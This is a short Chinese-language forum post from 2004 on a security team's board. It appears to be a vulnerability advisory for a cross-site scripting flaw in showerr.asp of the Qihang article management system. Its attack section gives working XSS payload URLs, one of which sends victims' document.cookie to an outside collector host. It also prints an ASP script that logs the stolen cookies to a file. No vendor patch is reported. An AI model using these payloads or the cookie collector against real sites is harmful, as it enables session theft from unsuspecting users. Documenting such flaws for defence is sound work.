邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [原创]启航文章管理系统存在跨站脚本漏洞 [查看完整版本]

hak_ban[HSG] 2004-12-28 23:42

[原创]启航文章管理系统存在跨站脚本漏洞

本文作者： rain[B.C.T]
文章出处： 原创 [url]http://www.bnso.net[/url]
阅读次数： 424
发布日期： 2004-12-8
受影响版本：
启航文章管理系统目前所有版本


漏洞描述：
showerr.asp存在跨站脚本漏洞，恶意者可以构造有效连接非法获得远程用户cookie。


攻击方法：
[url]http://www.target.com/showerr.asp?action=Err_info&ErrMsg=<script>alert[/url](document.cookie)</script>
[url]http://www.target.com/showerr.asp?action=Err_info&ErrMsg=<script>[/url] document.location=&#39;[url]http://yoursite.com/cookie.asp?[/url]&#39;%2Bdocument.cookie
</script>
其中“%2B”代表“+” 。

cookie.asp如下，即可收集cookie：


quote:
--------------------------------------------------------------------------------

<%
Testfile=server.mappath("info.txt")
Msg=request.servervariables("QUERY_STRING")
Set fs=server.createobject("scripting.filesystemobject")
Set thisfile=fs.opentextfile(testfile,8,true,0)
Thidfile.writeline(""&msg&"")
Thisfile.close
Set fs=nothing
%>

--------------------------------------------------------------------------------



厂商补丁：

启航文章管理系统
-----
目前厂商并没有发布了升级补丁以修复这个安全问题

查看完整版本: [原创]启航文章管理系统存在跨站脚本漏洞

© 1999-2008 EvilOctal Security Team